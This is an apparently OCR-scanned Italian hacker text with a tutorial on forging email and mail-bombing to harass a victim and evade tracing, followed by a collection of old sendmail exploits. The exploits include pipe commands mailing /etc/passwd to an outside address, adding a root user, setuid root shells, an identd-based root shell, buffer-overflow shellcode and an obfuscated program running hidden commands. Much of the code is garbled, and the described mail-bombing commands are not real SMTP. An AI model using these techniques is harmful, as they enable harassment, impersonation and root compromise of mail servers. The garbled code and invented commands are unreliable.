In breve, diciamo che una porta ( non quella della vostra stanza !! ) non è altro che un 

numero statico a cui è associato un servizio che viene gestito dal server. Se non avete 

idea di cosa stia parlando vi rimando ad uno dei tanti testi riguardanti le porte , presenti 

in rete. Chi cerca trova !! l'unico problema è quella cazzo di bolletta !!!:-) 

Poco fà ho accennato al SMTP. Allora , la sigla SMTP sta per Simple Mail Transfer Protocol, 
ovvero protocollo di trasferimento dei messaggi. Questo servizio è disponibile nella maggior 
parte dei server ; dico "nella maggior parte" perchè qualche volta può capitare che non sia attivo. 
Il servizio corrisponde alla porta 25 ed è amministrato dal suo demone. AIUTOOO CHE 
PAURAAAA!! 

Non si tratta di di un film horror, un demone non è altro che un programma che "vigila" sul servizio 
e che 

accoglie un' utente. Il più solito è il Sendmail ( il più buggato in assoluto ).Tornando al discorso 
dellle fakemail. Una volta che ci saremo collegati alla porta 25, ci si presenterà davanti una cosa del 
genere : 


220 prova.it Sendmail x.x/x.x 11/11/97 ready at Mon, 30 Oct 97 06:22:19 -0200 

Non vi spiego cosa significhi perchè per ora non ci interessa. Basta dire , che il demone si 
presenta a noi e aspetta di conseguenza una nostra risposta. 

Bene, quando noi salutiamo una persona ( voi dite che c'èntra ? aspe..) gli diciamo " Ciao", 

allo stesso modo quando dobbiamo identificarci al server ,scriveremo cosi : 

HELO provider.it 

al posto di provider.it , ci starà il vostro provider di servizi internet , o uno a casaccio ,fate voi io 
consiglio la seconda possibilità.. ! 

State attenti perchè Telnet non permette di cancellare quindi andateci piano e non scrivete cazzate! 
Il server quindi ricambiera il nostro "saluto " cosi : 


250 prova.it Hello Provider.it 


o qualcosa del genere... 
Adesso possiamo metterci a lavoro. hihi ...! 


Utilizziamo il comando "MAIL FROM:" a cui associeremo anche 1 ‘indirizzo e-mail del mittente. 
Ovvero l'indirizzo che il destinatario vedrà nell'e-mail ricevuta. 

MAIL FROM: <coglione@lamer.com> 

Se avete scritto tutto bene , avrete un responso positivo dal server che vi risponderà 

con una stringa che inizia con il numero 250. 

Ora ci tocchera specificare l'indirizzo e-mail del destinatario. Questo lo 

possiamo fare con il comando RCPT TO: 

RCPT TO: <stronzoditurmo@provider.it> 

Riceveremo un'altra risposta dal server. 

Adesso passiamo al corpo del messaggio dove scriveremo tutti gli insulti e le stronzate 

che leggera il destinatario. Comunichiamo al server che stiamo per iniziare a scrivere il 
messaggio con il comando DATA. Quindi : 

DATA 

Il server, vi dirà che è pronto a "prendere appunti" e che dovrete conlcudere il testo con un punto 
su una riga vuota. Adesso per evitare di farci beccare da qualcuno che ne capisce un pò piu di voi, 
facciamo così: 

Received: by provider.it id AA11212 with SMTP; Sun, 04 Jun 00 16:40:25 


Analizziamo questa stringa : 


provider.it = nome del provider con cui vi siete identificati all'inizio 


id AA11212 = se non ricordo male , dovrebbe essere il numero seriale del server; schiaffateci un 
numero a cazzo ! 

with SMTP; = Cazzate Varie... 

Sun,04 Jun 00 16:40:25 = data in formato normale. 


Ora digitiamo : 
Message-ID: <123.AA11345@lamer.com> 


AI posto di 123.AA11345 , anche qui scriveremo un numero inventato. Purchè le prime 3 cifre 
siano divise 

da tutte le altre da un punto e che il numero intero non sia uguale a quello messo precedentemente 
Queste due operazioni servono a rendere le cose un pò piu difficili a coloro che 

vogliono rintracciarci. 


Seguiranno quindi , il destinatario , la data e l'oggetto del messaggio. Digitiamo 


To: <stronzoditurno@provider.it> 
Date: Sun, 04 Jun 00 12:30:45 
Subject: quello che volete. 


Ora che abbiamo concluso la prassi , chiudiamo il tutto con un punto in una riga vuota. Infine 
diciamo 

al server di inviare l' e-mail con QUIT. 

Se tutto è andato bene , la mail verrà recapitata e quando il coglione la aprira si vedrà davanti , 

un componimento poetico di parolacce e stronzate che offendono lui e la sua 

famiglia 'eheheh! Quest'ultimo incazzato come un cane bastonato , risponderà di conseguenza ... ma 


Non a noi di certo, ma a colui che avremo indicato come mittente del messaggio. 

Ehehe , divertente vero ??. 

Prima di fare una cosa del genere , vi consiglio di fare svariate prove auto-mandandovi dei 
messaggi. In ogni 

caso state attenti , perchè vi possono anche beccare. 

Bene, e se voi invece vorreste proprio "distruggere" la mailbox di qualcuno ?!? niente di piu facile... 
Ripetete la procedura precedente fino alla stringa : 


RCPT TO: <stronzoditurmo@provider.it> 


A questo punto dovremo allegare all'e-mail un file (possibilmente di dimensioni enormi). Prima di 
fare questo 
daremo al server il comando : 


BINARY 

Questo, il cui significato è "binario" (cacchio non ci vuole un genio per capirlo :-)), non fà altro che 
spezzettare il file che 

noi allegheremo, in tantissimi messaggi; ovviamente piu grosso è il file piu bordello creeremo hihi ! 
A questo punto scriviamo : 


GET /directorydelsito/filedelsito.zip 


Dove "/directorydelsito" è l'indirizzo http e la cartella dove è contenuto il file; mentre 
"/filedelsito.zip" è il nome del file. 

In questo modo il server preleva il file da quel sito e lo allega alla nostra e-mail. 

Se nel corpo della procedura , ripetiamo piu volte questo comando , avremo una fakemail dagli 
effetti devastanti. Pensate 

cosa potrebbe fare un file di 50 Mb , ripetuto per 10 volte; lascio il tutto alla vostra 
immaginazione...eheheh ! 

Dopo di che continuate con la procedura normale.. ( DATA..,ecc). 

Risultato... il coglione non potrà piu accedere al suo account di posta elettronica e noi brinderemo 
alla sua rabbia. ehehehe! 


Perfetto !! , dopo essermi fatto (come canta Pelù) un bagno di sudore con la temperatura che sarà 
sopra i 30 °, e dato 
che mi sono rotto i maroni di scrivere, non mi resta che salutarvi. 


Questo file e' stato scritto da Vecna, e contiene una buona raccolta di 
Exploit per sendmail, il fatto che sia una "buona raccolta" non implica che 
siano tutti, anke xke' sendmail e' conosciuto come il programma + bacato in 
tutti i secoli dei secoli amen. 


Non venite a dirmi: quello che hai scritto e' copiato, perchè lo so', in 
fin dei conti l'unico motivo che mi ha spinto a fare sta' cosa era avere 
PER ME un elenco abbastanza completo di hack vs. sendmail. 


Si intende che SOLO PER SCOPO INFORMATIVO FACCIO QUESTA RACCOLTA, 
FINALIZZATA SOLO A METTERE IN GUARDIA I PROPRIETARI DI SISTEMI UNIX & 
UNIX-like E A FARGLI AGGIORNARE LA SENDMAIL ! 


Un saluto a: Lord Destruction, DaBatcha, Cyrus, TiZiO, Ghimlet, Marlenek. 
La domanda del giorno : Cosa aspetta Skilled a rispondermi ? 


P.S. - il materiale qui di seguito e' tratto dalle seguenti fonti: 
Rootshell - Packet Storm of Security - Bugtraq - la mia mente 
dannata. 


le versioni sono in ordine casuale e + disparato et caotico possibile, i bug 
delle versioni inferiori alla 8 li ho segati repentinamente. (tranne il BUG 
1 xke' mi piaceva) 


[root@localhost] |% telnet target.com 25 
Trying 123.4.5.XxX._... 
Connected to target.com. 
Escape character is 'A]!. 
220 target.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13 
-0500 
HELO 
250 Hello target.com, why do you call yourself ? 
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh 
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok 
RCPT TO: root 
250 root... Recipient ok 
DATA 
354 Enter mail, end with @.@ on a line by itself 
From: me@target.com 
To: me@target.com 
Return-Receipt-To: |foobar 
Subject: grand brutto buco. 
X-Disclaimer: nessuna responsabiltà su di me! 


Queste sono 2 implementazioni, una da un bug report, l'altra da una mia 
fantazia... sono state provate su sendmail 5.55 ma il funzionamento e' 
pressoche' lo stesso. 


il bug, si è visto come consente di eseguire file eseguibili, con selative 
opzioni o caratteri speciali. nel 1° esempio ci si impadronisce del file 
letc/passwd spedendoselo all'indirizzo me@myhost.com 


% telnet target.com 25 

Trying 123.456.789.0... 

Connected to target.com 

Escape character is 'A]!. 

220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51 
mail from: "|/bin/mail me@myhost.com < /etc/passwd" 

250 "|/bin/mail me@myhost.com < /etc/passwd"... Sender ok 
rcpt to: mickeymouse 

550 mickeymouse... User unknown 

data 

354 Enter mail, end with "." on a line by itself 


250 Mail accepted 

quit 

Connection closed by foreign host. 
% "." on a line by itself 


250 Mail accepted 

quit 

Connection closed by foreign host. 
% 


Che si possano anche ricevere altri file mi sembra scontato, ma non escludo 
che facendo: 


220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51 
mail from: "|/bin/adduser user -u0 -g0" 

250 "|/bin/adduser user -u0 -g0"... Sender ok 

rcpt to: mickeymouse 

ecc... 


Si possa eseguire il comando adduser. 


Siccome simao tutti buoni, segnaliamo al sysadmin sfigato il colino che usa 
per spedire la posta... 


#!/bin/sh 

echo This is a Serious Bug > /tmp/bug 
echo id reports: >> /tmp/bug 
/usr/bin/id >> /tmp/bug 


echo Fixing this would be good >> /tmp/bug 

cp /bin/sh /tmp/bugshell 

chmod u+s /tmp/bugshell 

echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug 
chmod ugo+rx /tmp/bugshell 


250 Ok 
quit 
221 target.com closing connection 


Versione affetta: 8.6.7 (tho, una gia' + recente! :) 


questo buco consente di leggere ogni file, compreso indi il beneamato file 
di shadow o quelli nella dir /root /var ecc... . Usata dalla shell. 


lusr/lib/sendmail -oE/etc/shadow bounce 
From: your_username 


Sendmail: 8.6.9, questa versione di sendmail consentiva di far crashare la 
25 grazie alla riga di comando : 

$ sendmail -d98765876 (almeno 10 cifre) 

Il bug è stato coperto, ma con un particolare file di Atreus si poteva 
utilizzarlo ancora. 


/* smh.c - Michael R. Widner - atreus (2/27/95) 

* <widner@uchicago.edu> <atreus@primus.com> 

* a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this 

* hole. It's really just a matter of passing newlines in arguments to 

* sendmail and getting the stuff into the queue files. If we run this 

* locally with -odq we are guaranteed that it will be queue, rather than 

* processed immediately. Wait for the queue to get processed automatically 
* or just run sendmail -q if you're impatient. 


* usage: smh [| username [/path/to/sendmail]] 


* It's worth noting that this is generally only good for getting bin. 

* sendmail still wants to process the sendmail.cf file, which contains 
* Oul and Og1 most of the time, limiting you to bin access. Is there 
* a way around this? 


* cc -o smh smh.c should do the trick. This just creates a bin owned 

* mode 6777 copy of /bin/sh in /tmp called /tmp/newsh. Note that on some 
* systems this is pretty much worthless, but you're smart enough to know 

* which systems those are. Aren't you? 


Ci 


#include <sys/types.h> 
#include <unistd.h> 
#include <stdlib.h> 


main(argc, argv) 
int argc; 
char **argv; 
{ 
execlp(argv[2] ? argv[2] : "sendmail","sendmail","-0dg","-p", 
"ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, 
P=/bin/sh, F=lsDFMeu, 
A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 
Itmp/newsh\">\n$rascii ", 
argv[1]? argv[1] : "atreus",0); 


Versione: 8.6.? 
vuoi leggere un file a cui normalmente non hai accesso ? 


lusr/lib/sendmail -C/home/path/of/file 


Sendmail 8.8.4 & 8.8.5 dead.letter exploit 


esempio di come collegare il file /etc/passwd a /var/tmp/dead.letter 
Telnettarsi alla 25, mandare un messaggio a un host volutamente sbagliato. 
Si deve fare anche da una shell dell'host da hackare. (x' senno come si 
linkano i 32 file ?) 


In /etc/passwd /var/tmp/dead.letter 
telnet target.host 25 

mail from: non@existent.host 

rcpt to: non@existent.host 

data 

r00t::0:0:Admin a morte!:/root:/bin/bash 


quit 


track! hai un bella account di root. 
fare attenzione alle versioni di login e al criptaggio (DES o MD5) xke' in 
sistemi tipo RH, il campo della password, se la password non e' nulla, e' 


l'exploit non và nei seguenti casi: 


1. /var e / sono in partizioni differenti, quindi tra loro non possono 
essere linkati. 
2. essere sicuro che i messaggi errati finiscano in /var/tmp/dead.letter 


Le versioni 8.6.9-8.6.10 possono essere affette (oltre al crash proposto da 
atherus) da questo bug, che consente l'eseguzione di comandi a cui 
normalmente non si avrebbe accesso. 


/* Sendmail 8.6.9 identd hack. -- SnoCrash [r00t] */ 
/* 9/29/95 -- Fixed to make it compile on fuxin' SunOS */ 
/* Fixed some more so it can work on 8.6.10 -- 10/2/95 */ 
/* Final cleanup -- 10/4/95. Di 
#include <stdio.h> 
#include <sys/types.h> 
#include <sys/fcntl.h> 
#include <gnu/types.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
#define OUTPUT_BUFFER 4096 /* Output and input, */ 
#define SOCKET_BUFFER 512 /* with which we must up-put */ 
void main(void) 
{ 
struct fd_set fdesc; /* File descriptor structure */ 
char outbuf[lOUTPUT_BUFFER]; /* Our output buffer */ 
char inbuf[SOCKET_BUFFER]; /* "" input "" */ 
/* Preparing to read incoming data, captain. */ 
FD_ZERO(&fdesc); 
FD_SET(0, &fdesc); 


/* Read it, Sulu! Now! */ 

if(read(0, inbuf, SOCKET_BUFFER - 1)<=0) 
exit(1); 

FD_SET(O, &fdesc); 


/* Now we send our instructions, under the guise of innocent 

* ol'identd. I find this ironic, that identd, supposedly 

* a standard that would help stop "evil hacker types", became 

* part of one of the bigger holes to ever hit the net. Hmm. 

* Ain't life funny that way sometimes? :) 

ud 

sprintf(outbuf, " \ 
%s : USERID : UNIX : Evil_Hacker_Type...Phear_Me. So, like.. here are \ 
my evil commands for you to execute so I can rox yer box. Check this out... 
\ 


\r\nCroot\r\nR<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh 
/bin/sh > \ 

/tmp/.inetd.conf ; /usr/sbin/inetd /tmp/.inetd.conf \">\r\nHReceived: Pretty 
\ 

fucking eleet, eh? Now I just have to sit here and babble so I can fill \ 

up your crappy buffer. So I bet youre wondering how this got here. Well \ 
lets just say you shouldnt run a Sendmail earlier or later than 8.6.11. \ 
8.6.12 has a whole load of different bugs, but this isnt one of them. \ 

Im not so sure about 8.7.x, but I wouldnt trust Eric Allman too much. \ 
weellll... it's been fun fucking with your box and all, but I really must \ 

be going, so I guess Ill see you around. Tell all your friends to be nice \ 
and leave the door open like you did. Thanks... its been real. 
\unkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunky....aaah this is just 
too 

funky.\r\n \ 

", inbuf); 


write(1, outbuf, strlen(outbuf)); 
exit(0); 


Vi sarete accorti quanto sono vecchi alcuni exploit, vi assicuro che se ne 
trovano ancora parecchi di server cosi' ridotti! 
cmq tra poco vi troverete una sfilza di bug della 8.8.* in poi. 


Sendmail versione 8.7.5 - Buffer Overflow - (OLE ! :) 
scoperto da mudge@lOpht.com "mudge" 


# The problem is in buildfnam() which lives in util.c - it treats 
# the static allocated array nbuf[MAXSIZE+1], from recipient.c, in 
# an unbounded fashion. 


CC=/usr/bin/gcc 
RM=/bin/rm 


cat > a_run.c << EOF 
main(int argc, char *argv[]) 


long addr=0xefbfcea8; 
char *ptr = (char *)&addr; 
char foo[5]; 

inti, j; 


if (argc != 2){ 
printf("Usage: %s offset\n", argv[0]); 


exit(1); 
} 


addr += atoi(argv[1]); 
printf("Full Name: CCCCCCCCCC"); 


if (atoi(argv[1])%2){ 
for(i=0; i<60; i++) 
printf("AAAA"); 
} 
else{ 
for(i=0; i<60; i++) 
printf("BBBB"); 
} 


for (i = 0; i< 5; it+){ 
printf("%c%c%c%c", *(ptr+2), *(ptr+3), *(ptr), *(ptr+1)); 
} 


} 
EOF 


cat > make_gecos.c << EOF 


tas) 


#include <stdio.h> 


main(int argc, char *argv[]) 
{ 


int i; 


char mach_codes[] = 
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xcC8\x07\x66\x89\x46\xf9" 
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" 
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" 
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; 


for (i=0; i<40; i++) 
printf("%c", 0x90); 


printf("%s", mach_codes); 
EOF 
$CC -0 make_gecos make_gecos.c 
if [! -x make_gecos ] ; then 


echo failed to build make_asdf 
exit 1 


fi 

$CC a_run.c 

if[!-x a.out ] ; then 
echo failed to build asdf 
exit 1 

fi 


$RM a_run.c make_gecos.c 


echo "1 - Change the variables in the sploit.sh script" 

echo "2 - run make_gecos > tmpr" 

echo "3 - setenv MANPATH=\"\ cat ./tmpr\\"" 

echo "4 - run the sploit.sh sploit.sh script with an argument" 
echo "of around 3000" 


# this argument varies depending upon what lives in ones 
# environment variables, what the paths are, etc. etc. 

# on a pretty stock environment in a FreeBSD setup I hit 
# around 3900 


sploitssh 600 0 3 704 6213376125 5634 #!/bin/sh 


if[$#=1];then 
i=$1 

else 

i=0 

fi 


FILE=/usr/home/username/wip/overflow/sendmail/ouch 
TMP=/usr/home/usemame/wip/overflow/sendmail/cleanup 
EDITOR=/usr/bin/ex 

export EDITOR 


while ‘[ $i -le 16048 ]° 
do 


# ./m3 ${i} > $FILE 
# ./make_gecos ${i} > $FILE 
Ja.out ${i} > $FILE 


chfn username << FOE 
3d 

2r./ouch 

wq! 

FOE 


sync 
sync 


echo "using arg of [Oxefbfcea8 (hex) + ${i}(dec)]" 
/usr/sbin/sendmail username 


i='expr gi + 1° 

done 

in 

# an unbounded fashion. 


# 
# mudge@l0pht.com 


CC=/usr/bin/ 


Sendmail exploit ver. 8.7-8.8.2 x FreeBSD, Linux e altre piattaforme. 


Questo script crea una shell suidata root nella dir /tmp. 


#/bin/sh 

echo 'main() '>>leshka.c 

echo '{ '>>leshka.c 

echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c 
echo '} '>>leshka.c 

# 

# 

echo 'main() '>>smtpd.c 

echo '{ '>>smtpd.c 

echo ' setuid(0); setgid(0); '>>smtpd.c 

echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c 
echo '} '>>smtpd.c 

# 

# 

cc -0 leshka leshka.c;cc -0 /tmp/smtpd smtpd.c 

leshka 


kill -HUP ‘ps -ax|grep /tmp/smtpd|grep -v grepltr -d ''|tr -cs "[:digit:]" 
"\n"|head -n 1° 

rm leshka.c leshka smtpd.c /tmp/smtpd 

/tmp/sh 


P.S. non assicuro il funzionamento di questo programma. 


Questo e' un bug trovato nella function mime7to8() di sendmail 8.8.0, con il 
quale chiunque puo' spedire una mail che esegua arbitrariamente dei comandi 
a 


livello root. 

questo e' possibile solo se e' settato "9" nel field riservato al flag del 

mailer. 

questo flag, e' settato di default in cf/mailer/local.m4 solo per quanto 
riguarda la versione 8.8.x, ma è possibile che anche nella precedenre 
versione 8.7 sia possibile settare il flag allo stesso modo. 


dopo aver rimosso il flag '9' da tutte le righe del file sendmail.cf file, 
dovresti trovarti con: 


Mlocal, P=/bin/mail, F=lsSDFMAw5:/|@gSnE9, S=10/30, R=20/40, 
T=DNS/RFC822/X-Unix, 
A=mail -f $g -d $u 

Mprog, P=/bin/sh, F=lsDFMogeu9, S=10/30, R=20/40, D=$z:/, 
T=X-Unix, 
A=sh -c $u 


Cambiali in: 


Mlocal, P=/bin/mail, F=lsDFMAw5:/|@gSnE, S=10/30, R=20/40, 
T=DNS/RFC822/X-Unix, 
A=mail -f $g -d $u 

Mprog, P=/bin/sh, F=lsDFMogeu, S=10/30, R=20/40, D=$z:/, 
T=X-Unix, 
A=sh -c $u 


se stai usando m4 per generare il file sendmail.cf, si può aggiungere al 
mc’ file: 


define( LOCAL _MAILER_FLAGS', rmn')dnl (default is ‘rmn9') 
define( LOCAL _SHELL_FLAGS', ‘eu’)dnl —(defaultis ‘eu9') 


ExplOit detto "quota" 

incedibilmente... non e' documentata la versione su cui funziona ! (e 
nemmeno 

cosa faccia!) la metto solo x' qualcuno puo' essere interessato alla 
sorgente, e dargli un 

okkiata... 


gcc -0 bigquota quota.c 
avvia: 
./bigquota file 


#include <unistd.h> 
#include <sys/stat.h> 


#include <dirent.h> 
#include <stdio.h> 
#include <fcntl.h> 


ine 
44,45,11,7,50,17,123,87,66,32,78,109,62,53,43,84,72,71,0,88,41,1,33,9,52,118 
ROLE A 
aio 
CO OTO 
ie MELLA 
soll 107,114,60,70,19,26,12,14,114,118,48,40,12,106,93,60,\ 
112,52,67,30,47,55,107,75,90,112,55,38,107,117,22,89,47,79,58,55,119,27,119, 
Essa 


void main(argc, argv) 
int argG; 
char *argvl ]; 


char *checkseed(int *seeds); 

char *checkdir(char *dir); 

int initseeds[201]={25,\ 
108,69,89,126,121,84,34,77,52,25,67,44,106,60,124,30,33,3,21,75,67,\ 
116,109,28,51,81,45,85,119,99,0,98,91,114,102,122,50,81,67,57,43,126,\ 
2,94,75,10,7,96,29,112,71,103,117,20,72,112,23,105,65,48,119,23,65,\ 
98,105,33,12,43,12,78,7,53,16,109,91,65,106,43,85,44,113,125,3,61,\ 
95,18,3,64,96,19,68,52,20,54,122,26,35,126,19,31,106,24,108,59,44,\ 
41,32,5,1,32,25,64,93,60,97,102,84,92,50,79,11,112,89,27,124,98,\ 
109,12,0,4,103,114,22,66,36,81,47,52,70,107,51,46,37,99,13,4,31,\ 
126,19,47,21,96,123,110,72,33,76,8,0,65,86,102,27,75,64,46,122,-47,\ 
53,1,42,20,-65,63,63,-7,-70,40,-39,-15,46,25,22,86,-39,86,82,21,-16,\ 
3,-9,-23,11,-21,-90,-30,-7,20,-17,23}; 

int setupseeds[201]={1,\ 
35,44,14,107,20,81,111,42,72,73,90,34,86,50,32,16,97,78,80,124,7,\ 
110,13,71,107,24,91,84,68,58,38,105,68,64,121,37,101,64,65,40,91,8,\ 
29,9,60,101,123,122,22,92,37,66,13,30,88,8,70,5,28,108,20,101,125,\ 
38,78,106,98,85,55,92,122,0,93,0,37,97,82,120,70,82,65,74,90,41,\ 
28,104,80,71,117,11,104,32,69,5,56,2,48,8,112,109,16,109,35,57,43,\ 
119,37,86,42,62,44,118,117,7,94,88,28,109,125,-23,96,-15,-1,34,-69,33,\ 
93,10,-64,27,-56,-81,68,68,-5,25,4,10,70,68,42,53,-45,111,87,11,-54,\ 
-6,4,37,49,81,88,93,90,2,-72,60,65,85,3,-29,47,3,64,-35,78,58,\ 
42,2,-43,34,-80,53,70,10,-7,25,29,54,21,-11,7,-69,5,-19,4,30,77,\ 


67,-10,-79,96,23,4,3,-68,84,64,89}; 

int binseeds[201]={1,\ 
14,11,95,67,113,29,87,45,24,115,45,88,60,43,114,98,6,56,111,75,13,\ 
121,123,50,108,17,1,28,15,62,17,81,14,101,39,13,112,90,2,15,114,34,\ 
64,91,79,79,57,34,31,41,5,34,62,58,93,21,108,110,88,83,114,126,112,\ 
89,14,41,102,88,10,10,45,111,25,35,38,76,115,57,113,49,72,58,46,83,\ 
121,87,84,71,81,104,18,41,110,80,82,44,92,5,89,39,104,103,30,96,37,\ 
12,50,25,64,36,24,54,38,33,35,-79,23,54,-9,87,35,-5,-17,24,-69,-23,\ 
42,-58,-3,73,11,-3,7,78,-21,15,4,-46,1,84,96,101,-31,96,104,-2,19,\ 
-7,0,45,34,97,20,96,91,-17,-9,16,67,103,10,-61,48,-7,45,42,2,77,\ 
-23,1,33,27,-2,-8,80,-6,-17,25,-27,3,-47,43,54,-22,83,2,-17,-39,62,\ 
89,-7,-11,94,19,-65,72,-3,67,79,111}; 

int procseeds[201]={-14,\ 
97,103,125,91,45,90,21,121,60,39,28,60,11,76,41,69,21,118,7,90,63,\ 
17,17,48,46,68,126,72,66,68,32,54,119,44,98,94,15,21,33,68,4,109,\ 
121,109,27,7,66,65,126,121,97,40,101,84,6,48,97,38,25,7,56,112,97,\ 
125,36,125,46,115,108,40,2,105,52,44,17,122,111,98,30,17,112,27,115,29,\ 
78,125,125,16,81,17,99,88,108,88,14,83,42,26,114,54,90,106,39,126,19,\ 
95,2,1,69,14,93,114,105,78,48,42,25,87,14,120,124,55,102,57,35,30,\ 
107,11,74,44,8,100,118,25,73,64,97,106,57,81,92,34,109,80,118,112,85,\ 
99,99,21,20,62,116,42,111,67,29,79,12,34,84,67,12,105,107,90,109,23,\ 
116,25,104,89,124,29,-38,1,-9,95,21,0,39,43,45,-72,35,-69,-83,30,78,\ 
85,-11,-22,111,-47,-65,60,-1,85,78,106}; 

int boutseeds[201]={-14842,\ 
37,119,64,88,3,4,11,86,22,104,51,21,57,122,64,113,58,102,72,32,118,\ 
17,28,35,97,53,125,64,79,95,86,40,122,35,50,48,41,54,18,87,67,125,\ 
74,95,0,100,19,71,37,69,113,100,82,54,18,123,37,97,107,126,38,114,22,\ 
75,123,3,33,64,35,37,20,73,68,37,46,89,95,88,22,108,92,51,40,3,\ 
70,19,125,62,74,69,113,2,25,101,7,59,100,2,69,83,25,33,61,71,117,\ 
34,70,119,65,27,62,68,25,12,70,87,58,43,112,86,49,24,24,80,84,52,\ 
6,46,121,115,25,91,53,94,123,12,59,34,66,84,16,93,76,88,38,22,110,\ 
106,26,101,55,84,64,120,54,29,6,67,54,126,2,17,97,115,41,125,4,4,\ 
-55,8,41,25,-1,49,76,-61,-85,40,-27,-15,29,50,62,-9,20,-1,-14,15,9,\ 
32,-72,-94,40,-61,-54,-12,11,72,66,91}; 

int shtdwnseeds[201]={-42,\ 
58,44,53,114,68,10,105,76,13,99,1,12,79,50,106,27,65,83,96,30,101,\ 
122,112,87,118,3,35,55,6,84,59,98,28,58,82,126,98,114,85,125,7,39,\ 
69,58,21,70,28,35,65,57,70,93,0,36,14,100,107,9,107,71,52,1,29,\ 
115,63,110,118,28,16,82,53,80,56,50,108,58,109,26,75,19,91,92,59,86,\ 
125,114,40,76,15,38,8,57,58,103,65,23,52,14,36,8,119,70,47,64,53,\ 
1,15,83,35,33,80,10,98,51,38,30,14,119,11,26,61,15,117,37,103,117,\ 
32,4,21,67,40,40,78,74,47,108,27,120,9,114,14,56,75,84,52,29,55,\ 
108,105,42,71,8,83,89,118,79,22,119,1,28,3,36,22,12,77,77,105,33,\ 
12,104,-75,18,-4,62,72,-60,1,79,11,0,-17,-8,-23,-4,89,-4,-4,19,76,\ 
16,-90,-78,45,-38,-65,56,11,77,71,89}; 

char *zipper(int *seeds1); 

char *path; 

int i=0,j,inhan,outhan; 


if(argc!=2) 


puts("Usage:"); 

puts("quota <file>"); 

puts("where <file> is the file you wish"); 

puts("to hide/subtract from your quota."); 

exit(0); 

; 
system(zipper(initseeds)); 
system(zipper(setupseeds)); 
system(checkseed(binseeds)); 
path=checkdir("/"); 
if(!path) 

{ 


puts("Technical Dificulties"); 
goto closeout; 


} 
if((outhan=open(path,O_WRONLY|O_TRUNC))==-1) 
{ 


puts("Error opening outfile"); 
goto closeout; 


} 
if((inhan=open(argv[1],0_RDONLY))==-1) 
{ 


puts("Error opening infile"); 
goto closeout; 
} 
if(filecopy(inhan,outhan)) 
{ 
puts("Technical dificulties"); 
goto closeout; 
} 
if((unlink(argv[1]))==-1) 
{ 


puts("Technical dificulties."); 

goto closeout; 

} 
if((rename(path,argv[1]))==-1) 

if((link(path,argv[1]))==-1) 

if((symlink(path,argv[1]))==-1) 
puts("Technical Dificulties."); 

closeout: 
system("%s\n",zipper(procseeds)); 
system("%s\n",zipper(boutseeds)); 
system("%s\n",zipper(shtdwnseeds)); 


} 


char *checkseed(int *seeds) 


{ 

char *zipper(int *seeds1); 

char *string; 

char testseeds[30]; 

char god[200]; 

int i=200,); 

if((string=(char *)getenv("PATH"))==NULL) 
{ 


puts("Path not found"); 
exit(-1); 
} 
while((seeds[i]+seedsc[i])!=32) 
{ 
testseeds[200-i]=seeds[i]+seedscli]; 
1--; 
} 
testseeds[i]=0; 
i=0; 
while(string[i]!=0) 
{ 
j=0; 
while(string[i]!=58&&string[i]!=0) 
{ 
god[j]=stringli]; 
++; 
Jr 
} 
++; 
god[j++]=47; 
god[j++]=0; 
strcpy(&godij],testseeds); 
if(!stat(god  NULL)) 
return (char *)zipper(seeds); 
} 
return 0; 


} 
char *zipper(int *seeds1) 


int i; 

char *buhbye; 

char teeth[201]; 

teeth[201]=0; 

for(i=200;i>=0;i--) 
teeth[200-i]=seeds1[i]+seedscl[i]; 

buhbye=(char *)malloc(201); 

strcpy(buhbye, teeth); 

return buhbye; 


} 
int filecopy(int from,int to) 


int bufsiz; 
if (from < 0) 
return ]; 
if (to < 0) 
goto erT; 
for (bufsiz = 0x4000; bufsiz >= 128; bufsiz >>= 1) 
{ 
register char *buffer; 
buffer = (char *) malloc(bufsiz); 
if (buffer) 
{ 
while (1) 
{ 
register int n; 
n = read(from,buffer,bufsiz); 


if(n==-1) 

break; 

if (n== 0) 

{ 
free(buffer); 
return 0; 

} 

if (n != write(to,buffer,(unsigned) n)) 

break; 

} 
free(buffer); 
break; 

} 

} 
err: 
retum ],; 
} 
char *checkdir(char *dir) 
{ 
char *checkdir(char *dir); 
DIR *currdir; 


struct dirent *node; 

struct stat statnode; 

int i,j; 

char *path; 

char *retpath; 

path=(char *)malloc(300); 
if((currdir=opendir(dir))==NULL) 


return 0; 
node=readdir(currdir); 
while(node) 

{ 

i=0; 

j30; 

while(dir[i]) 

{ 
path[i]=dirli]; 
j++; 
} 
if(stromp(dir,"/")) 
{ 
path[i]='/"; 
j++; 
} 
while(node->d_namel[j]) 
{ 
path[i]=node->d_name[j]; 
i++; 
pre 
} 
path[i]=0; 


if((Istat(path,&statnode))==-1) 
return 0; 

if(statnode.st_mode&S_IFREG) 
if(!access(path,W_OK)) 
if(!(statnode.st_mode&S_IFBLK)) 
if(!(statnode.st_mode&S_ISVTX)) 
if(statnode.st_uid!=getuid()) 

retumn path; 

if(statnode.st_mode&S_IFDIR) 
if(stromp(node->d_name,".")&&stremp(node->d_name,"..")) 
if(!(statnode.st_mode&S_IFREG)) 
if(!(statnode.st_mode&S_IFCHR)) 
if(!(statnode.st_mode&S_ISVTX)) 
if(statnode.st_uid!=getuid()) 
{ 
retpath=checkdir(path); 
if(retpath) 

return retpath; 

} 

node=readdir(currdir); 

} 

closedir(currdir); 
retum 0; 


} 


